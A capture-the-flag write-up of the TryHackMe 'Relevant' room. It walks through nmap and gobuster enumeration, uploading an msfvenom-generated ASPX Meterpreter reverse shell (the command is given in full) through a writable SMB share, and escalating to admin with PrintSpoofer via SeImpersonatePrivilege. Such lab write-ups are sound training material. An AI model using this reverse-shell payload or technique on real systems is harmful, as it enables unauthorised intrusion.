Relevant - HackMD

###### tags: `TryHackMe OffensiveSecurity AdvancedExploitation` # Relevant :::info I have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days. The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that I secure two flags (no location provided) as proof of exploitation: User.txt Root.txt ::: ## Reconnaissance ### Ports enumeration with nmap Basic enumerations with nmap showed me the opened ports. There are a samba share and a web server running on port **80**. ![](https://i.imgur.com/FJRtLZA.png) After doing others enumerations with nmap I discover there is another web server running on port **49663**. ![](https://i.imgur.com/2HK1cXr.png) ### Directories enumeration with gobuster ![](https://i.imgur.com/LRz5qnF.png) I discover a hiden directory : **/nt4wrksv** ### Samba share enumeration with smbclient ![](https://i.imgur.com/lyYpfcP.png) :::success I discovered that the hiden web server directory is shared and i found a `password.txt` file into it. ::: After more enumerations, it's appear that the **password.txt** file is useless. ## Gaining a first access I want to use the shared file to lunch a reverse shell. Let's try do do it. To do it : - I first create a reverse shell with `msfvenom` `msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=IP lport=1234 -f aspx -o shell.aspx` :::info A file with the **ASPX** file extension is an Active Server Page Extended file that's designed for Microsoft's ASP.NET framework. ASPX files are generated by a web server and contain scripts and source codes that help communicate to a browser how a web page should be opened and displayed. ::: - I put the shell in the hiden directory via the samba share ![](https://i.imgur.com/RX7D43e.png) - Then i create a handler with metasploit ![](https://i.imgur.com/JPW9UIp.png) :::success I GAIN A FIRST ACCES. `user.txt` found !!! ::: ![](https://i.imgur.com/8FNLyXj.png) ## Privilege elevations I type the command `getprivs` in meterpreter. This command checks the **privileges** present in the remote PC. ![](https://i.imgur.com/gmqkaXA.png) We can see that the `SeImpersonatePrivilege` is enabled. In windows, if a non admin user has the`SeImpersonatePrivilege` enabled, he can elevate his privileges by using tools like **PrintSpoofer** available [here](https://github.com/dievus/printspoofer.git). To elevate my privileges : - I download PrintSpoofer from github - I put it in the share like I did with the reverse shell ![](https://i.imgur.com/g6QrZw4.png) - from meterpreter i search for the shared directory and go into it ![](https://i.imgur.com/ULs2AdO.png) - From there i lunch the executable tool ![](https://i.imgur.com/vyz5XAH.png) :::success I HAVE THE ADMIN PRIVILEGES. `root.txt` found !!! ::: ![](https://i.imgur.com/2siJZ8h.png)